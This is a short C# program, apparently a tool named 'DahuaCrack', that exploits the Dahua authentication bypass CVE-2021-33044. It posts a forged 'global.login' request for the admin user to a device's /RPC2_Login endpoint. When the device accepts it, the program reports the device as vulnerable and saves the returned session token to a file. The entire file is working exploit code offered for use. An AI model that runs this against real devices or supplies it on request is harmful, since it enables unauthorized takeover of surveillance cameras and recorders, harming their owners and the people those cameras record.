using System; using System.Net.Http; using System.Net.Http.Headers; using System.Text; using System.Threading.Tasks; using Newtonsoft.Json; namespace Sandbox { public static class DahuaCrack { public static async Task Crack(string ip, string port, string protocol) { try { var httpClient = new HttpClient(); httpClient.Timeout = TimeSpan.FromSeconds(5); httpClient.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json")); var target = $"{ip}:{port}"; var url = $"{protocol}://{target}/RPC2_Login"; Console.WriteLine(url); var headers = new { Accept = "application/json, text/javascript, */*; q=0.01", XRequestedWith = "XMLHttpRequest", UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", ContentType = "application/x-www-form-urlencoded; charset=UTF-8", Origin = $"{target}/", Referer = $"{target}/", AcceptEncoding = "gzip, deflate", AcceptLanguage = "en-US,en;q=0.9", Connection = "close" }; var postJson = new { id = 1, method = "global.login", @params = new { authorityType = "Default", clientType = "NetKeyboard", loginType = "Direct", password = "Not Used", passwordType = "Default", userName = "admin" }, session = 0 }; var content = new StringContent(JsonConvert.SerializeObject(postJson), Encoding.UTF8, "application/json"); var response = await httpClient.PostAsync(url, content); var responseContent = await response.Content.ReadAsStringAsync(); Console.WriteLine(responseContent); if (responseContent.Contains("true")) { Console.WriteLine("vulnerable with CVE-2021-33044"); await System.IO.File.WriteAllTextAsync("vulnerable.txt", $"{url}\n{responseContent}"); Console.WriteLine("session token saved to vulnerable.txt"); } else { Console.WriteLine("Not Vulnerable with CVE-2021-3304!"); } } catch (Exception ex) { Console.WriteLine(ex.Message); } } } }